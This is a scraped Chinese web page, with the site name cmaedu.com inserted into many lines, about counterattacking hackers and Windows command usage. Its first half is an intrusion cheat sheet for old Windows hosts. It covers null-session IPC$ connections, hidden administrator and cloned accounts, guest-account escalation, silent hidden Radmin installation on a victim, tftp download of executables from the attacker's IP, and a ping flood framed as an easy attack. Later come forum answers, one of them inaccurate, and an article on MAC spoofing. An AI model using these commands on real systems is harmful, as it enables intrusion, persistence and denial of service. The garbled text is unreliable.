知道黑客的IP，如何反击他

通过DOS反向连接，然后计算机管理：command MMC

cmaedu.com结束进程：NET SHARE

查看版本：ver

查看中端(服务）：net start

cmaedu.com查看文件：dir

加用户：c:\winnt\system32net user adminserver$ admin /add

cmaedu.com提权限：net localgroup administrators adminserver$ /add

cmaedu.com211.38.172.2 2180

cmaedu.com查看用户net user

cmaedu.com远程连接到主机CMD命令：telnet 主机IP

踢人：logoff ID

cmaedu.com查看当前人：query user

打开telnet:net start telnet

cmaedu.comtelnet连接工具：OpenTelnet

cmaedu.com删除共享： net share c$=c:\

cmaedu.com删除共享： net share c$ /del

启用GUEST：net user guest /active:yes

cmaedu.com为GUEST设密码：net user guest 888888

cmaedu.com提升到管理员：net localgroup "Administrators" guest /add

超级用户隐藏器:c:\door adminserver$:admin

cmaedu.com克隆帐号：ca \\IP 你建立的帐号 密码 肉机默认帐号 密码

ca \\127.0.0.1 adminserver$ admin adminserver admin

cmaedu.com完全禁止系统模认工享

cmaedu.com[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]

cmaedu.com3389替换服务-----------------------

cmaedu.com中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

cmaedu.comc:\winnt\system32\copy termsrv.exe service.exe

cmaedu.comc:\winnt\system32\cd..

c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe

端口转向：f:\web\ "c:\fpipe.exe -v -l 开放的端口 -r 要转向的端口 ip"

使用空口令连接:

net use \\对方IP\ipc$ "" /user:"administrator"

cmaedu.com(在上传文件的目录下)远程复制文件:

c:\radminnet use \\a-01\ipc$ "12345" /user:administrator

cmaedu.comc:\ramdincopy r_server.exe \\a-01\admin$\system32

cmaedu.comc:\ramdincopy radmin.reg \\a-01\admin$\sytem32

cmaedu.com在对方CMD下：

c:\winnt\system32\regedit /s radmin.reg

c:\winnt\system32\r_server.exe /install /silenec

net start r_server

cmaedu.comcopy r_server.exe \\对方IP\admin$\system32

c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90

cmaedu.comcopy 文件名 \\IP\admin$\system32

cmaedu.com进入对方CMD:

c:\opentelnet.exe \\Ip administrator "" 0 90

cmaedu.com登陆CMD:

cmaedu.comc:\telnet IP 90

cmaedu.com安装RADMIN:

c:\winnt\system32\

r_server /install silence

cmaedu.comc:\winnt\system32\

cmaedu.comr-server

cmaedu.com导入注册表:

cmaedu.comc:\winnt\system32\regedit.exe /s aaa.reg

cmaedu.com看端口:

c:\winnt\system32\

netstat -an

改端口:

cmaedu.comc:\winnt\system32\

cmaedu.comr_server.exe /port:1024 /pass:1234 /save /silence

起动服务:

c:\winnt\system32\net start r_server

cmaedu.com隐藏文件:

c:\winnt\system32\attrib.exe +h r_server.exe +h

cmaedu.com%systemroot$\system32

看看共享开了没有,没有的话把共享开开

cmaedu.comc:\winnt\system32net share

清单是空的。

cmaedu.comc:\winnt\system32net share ipc$

cmaedu.com命令成功完成。

cmaedu.comc:\winnt\system32net share admin$

cmaedu.com命令成功完成。

cmaedu.com注册表运行命令

regedit

查看端口：netstat-n

cmaedu.comSA传送文件TFTP

先在本机开tftp服务 sqlexec

tftp-i IP get windxp.exe c:\windows\system32\com\windxp.exe

cmaedu.com℃冰河℃ 2007-01-02 19:50

cmaedu.comnet use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

cmaedu.comnet use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \\ip\c$ 登陆后映射对方C：到本地为H:

cmaedu.comnet use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名　密码　/add 建立用户

net user guest /active:yes 激活guest用户

cmaedu.comnet user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

cmaedu.comnet start 服务名　 开启服务；(如:net start telnet， net start schedule)

cmaedu.comnet stop 服务名 停止某服务

cmaedu.comnet time \\目标ip 查看对方时间

cmaedu.comnet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

cmaedu.comnet share 查看本地开启的共享

net share ipc$ 开启ipc$共享

cmaedu.comnet share ipc$ /del 删除ipc$共享

cmaedu.comnet share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

cmaedu.comnet password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

cmaedu.comnetstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

cmaedu.comnbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

cmaedu.comtracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

cmaedu.comping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

cmaedu.comping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

cmaedu.comdel -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

cmaedu.commove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

cmaedu.comat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

cmaedu.comfinger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP（属telnet登陆后的命令）

cmaedu.comtelnet 在本机上直接键入telnet 将进入本机的telnet

cmaedu.comcopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下

cmaedu.comcppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件

cmaedu.comcopy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：

cmaedu.comxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件

cmaedu.comtftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送

tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机

cmaedu.comftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)

cmaedu.comroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface

arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

cmaedu.comstart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令

cmaedu.commem 查看cpu使用情况

cmaedu.comattrib 文件名(目录名) 查看某文件（目录）的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性

cmaedu.comdir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序，并显示出：请按任意键继续....

cmaedu.comif 在批处理程序中执行条件处理（更多说明见if命令及变量）

cmaedu.comgoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）

cmaedu.comcall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）

cmaedu.comfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）

echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

cmaedu.comprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )

print 文件名 打印文本文件

ver 在DOS窗口下显示版本信息

cmaedu.comwinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）

cmaedu.comformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS

md　目录名 创建目录

cmaedu.comreplace 源文件　要替换文件的目录 替换文件

cmaedu.comren 原文件名　新文件名 重命名文件名

cmaedu.comtree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称

cmaedu.comtype 文件名 显示文本文件的内容

cmaedu.commore 文件名 逐屏显示输出文件

doskey 要锁定的命令＝字符

cmaedu.comdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=

cmaedu.comtaskmgr 调出任务管理器

cmaedu.comchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误

cmaedu.comtlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；

regedit /e 注册表文件名 导出注册表

cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

cmaedu.comREM 文本内容 在批处理文件中添加注解

cmaedu.comnetsh 查看或更改本地网络配置情况

它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的原理是这样的：网络上的机器都有唯一确定的IP地址，我们给目标IP地址发送一个数据包，对方就要返回一个同样大小的数据包，根据返回的数据包我们可以确定目标

主机的存在，可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧，在

DOS窗口中键入：ping /? 回车，出现如图1所示的帮助画面。在此，我们只掌握一些基本的很有用的参数就可以了。

cmaedu.com-t 表示将不间断向目标IP发送数据包，直到我们强迫其停止。试想，如果你使用100M的宽带接入，而目标

cmaedu.comP是56K的小猫，那么要不了多久，目标IP就因为承受不了这么多的数据而掉线，呵呵，一次攻击就这么简单的实现了。 够干死他了。不要用于其他目的哦！！！！！

我的IP地址总被别人盗取,如何防范呢,他们的方法是什么呢?

IP地址是由电信部门统一调配的配给物资,是共有的,不能被任何人盗取,就算盗取,那盗取的也是电信局的损失,电信会给你一个全新的IP共你使用,楼主多虑了.而且这东西都是标明身份了的,就像蒙娜丽莎的微笑和世界杯上的大力神杯,就算有人偷了去,他也不敢用,只要一使用马上就能被查出来并绳之以法,楼主就安心吧

■防止IP地址被盗策略

一般的，在一个局域网内IP地址分配的方式有绑定和动态分配两种：绑定的办法一般

是采用IP地址和网卡的MAC对应的办法进行绑定，动态分配则是在IP地址池中随即分配。在

很多时候，尤其主机要对外提供服务的时候，固定的IP地址是必须的，那么这时候IP地址

的绑

定就成了唯一的选择。但是，由于网卡的MAC地址是可以更改，而且能给被人从网上截取，

cmaedu.com所以，如果有人恶意的修改了自己的MAC地址与你的MAC地址一样，并使用你的IP地址，那

cmaedu.com你的IP地址就被对方成功的盗用了，导致你的机器无法联入网内。

在我校就是采用网卡的MAC地址和固定IP绑定的方法，目前来看都没有比较好的解决办

法，现在提出一种解决办法，不过这种办法有一个很大的要求，就是要求局域网采用Swit

cmaedu.comcher来组建，这似乎硬件成本比较高，而且这也不是我们学生可以左右的，不过全当是一

个了解吧。

IP地址绑定也不可靠

cmaedu.com 随着Internet的发展，上网成为人们日常工作和学习的一部分，随着上网的人越来越

多，对网络的管理就显的益发重要起来。在网络管理中要求有的计算机可以连入Internet

，有的计算机不能连入Internet，连入Internet的计算机有的可以出国，有的不能出国，

满足这些要求的解决方案之一就是在路由器上将被管理的计算机的IP地址和MAC地址绑定到

cmaedu.com一起。人们常常提到的IP地址盗用或MAC地址盗用，指的就是针对这种管理方式的黑客行为

，IP地址盗用的更形象的说法就是“他上网你付帐”，常常会给企业单位带来大量不应有

的经济损失。下面主要讨论一下这种方法存在的一些问题和改进措施。

cmaedu.com 标识网络中的一台计算机，一般至少有三种方法，最常用的是域名地址、IP地址和MA

cmaedu.comC地址，分别对应应用层、网络层、物理层。网络管理一般就是在网络层针对IP地址进行管

理，但由于一台计算机的IP地址可以由用户自行设定，管理起来相对困难，MAC地址一般不

cmaedu.com可更改，所以把IP地址同MAC地址组合到一起管理就成为常见的管理方式。

用以太网卡为例，常见的关于MAC地址的说法是：“以太网卡MAC地址由六段共12位十

六进制数组成，其中前6位由国际统一管理，网卡制造厂家申请到一个或多个只有前6位的

cmaedu.com地址后，为自己生产的网卡填入后6位，从而保证了全球网络物理地址（MAC地址）的唯一

性。”这种说法给人一种误解，认为作为主机标识的MAC地址不能更改或伪造，至少是很难

更改或伪造，把网卡的硬件标识同MAC地址的概念看成完全相同。这种误解导致在进行网络

cmaedu.com管理的时候，不加考虑就采用MAC地址于IP地址绑定的方式来防止IP地址被盗用，而不进一

cmaedu.com步考虑是否真的符合实际情况。

一台主机的MAC地址真的不能更改吗？让我们考虑一下以太网卡的工作机制，然后再来

回答这个问题。以太网采用的工作方式是CSMA/CD技术，也就是说同一子网的所有主机上的

cmaedu.com网卡都会收到其它机器的广播包，网卡收到广播包后放到自己的缓冲区内，由网卡的驱动

程序进行处理。常见的情况是，如果收到的报文中包含的MAC地址同此网卡的MAC地址相一

致，则将报文中数据交给上层（网络层）的处理软件进行处理；地址不符则丢弃报文。对

上层（网络层）来的数据，以太网卡驱动程序把此网卡的MAC地址同数据封装到一起组成以

太帧，然后广播出去。为了加快处理速度和考虑到其它网络应用，网卡的驱动程序并不是

每次处理一帧都去网卡的地址存储器中读出MAC地址，而是将MAC地址放入缓存中。这种工

作机制就决定了应用程序（或操作人员）可以用改变缓存中的数据或指定网卡驱动程序读

取某个缓存的方式来改变发送报文中包含的MAC地址或接收与本机网卡MAC地址不同的发向

其它MAC地址的报文。

cmaedu.com 例如：

cmaedu.com 在UNIX系统中，利用命令

ifconfig eth0 down //暂停网卡工作

ifconfig eth0 ether 11:22:33:44:55:66 //将此网卡MAC地址改为11:22:33:44:55:

cmaedu.com66

ifconfig eth0 up //恢复网卡工作

cmaedu.com 在Windows9x系统中，修改注册表

在HKEY_LOCAL_MACHINE\system\currentcontrolset\services\classes\net\000\下添

cmaedu.com加新键NetworkAddress，键值为112233445566，然后重新启动机器。

cmaedu.com 在WindowsNT系统中，修改注册表

cmaedu.com 在HKEY_LOCAL_MACHINE\system\currentcontrolset\services\yourNICname\下添加新

cmaedu.com键NetworkAddress，键值为112233445566，然后重新启动机器。

cmaedu.com 当然，也可以采用物理方法，现在的以太网卡，其MAC地址一般写在EPROM中，用擦写E

PROM的设备就可以更改MAC地址，不过在可用软件简单的处理的情况下，采用物理方法意义

不大。

cmaedu.com 通过上面的讨论可以看到，对同一子网内简单的采用MAC地址同IP地址绑定的方法，不

一定能很好的解决IP地址盗用问题。解决IP地址盗用问题比较有效的措施是采用主机连入

的Swith端口、MAC地址、IP地址三者同时绑定。

cmaedu.com

要是知道黑客攻击我电脑的IP地址,我要怎么反攻？

cmaedu.com可以避免的方法就是当有人攻击你的时候你速度断开网，如果是ADSL用户的话重新启动一下猫就重新分配了一个IP地址，这样就可以躲开他的攻击。如果你要想反攻的话我想以你自己的能力好像做不到，因为攻击需要很多肉鸡（电脑）对你的IP地址同时攻击 你没有肉鸡攻击个屁啊。

cmaedu.com

如何防止黑客用IP攻击

推荐楼主安装360安全卫士，360安全卫士的木马防火墙，对于木马查杀防御效果是很好的，另外最新版的360安全卫士的功能大全中，还增加了“系统防黑加固”功能，可以有效防止木马入侵你的系统，祝你好运朋友。

计算机被黑客攻击，如何反向追踪IP原始攻击地址？

cmaedu.com如果在受攻击前，安装了网络侦测软件，那么在遭到攻击时可以直接显示黑客IP。除此之外，基本上就只能依靠防火墙了。

购买一个硬件防火墙并安装，如果遭到攻击，硬件防火墙不但会自动拦截，还可以查看连接日志找出对方IP。

软件防火墙现在大多也提供了在检测到遭到攻击时自动屏蔽网络连接、自动“隐身”的功能，并且自动给出对方IP。

cmaedu.com不过需要注意的一点是，现在很多黑客都采用了动态/伪装IP来逃避追踪，因此追踪到IP之后一定要及时利用，可能片刻之后就会失效了。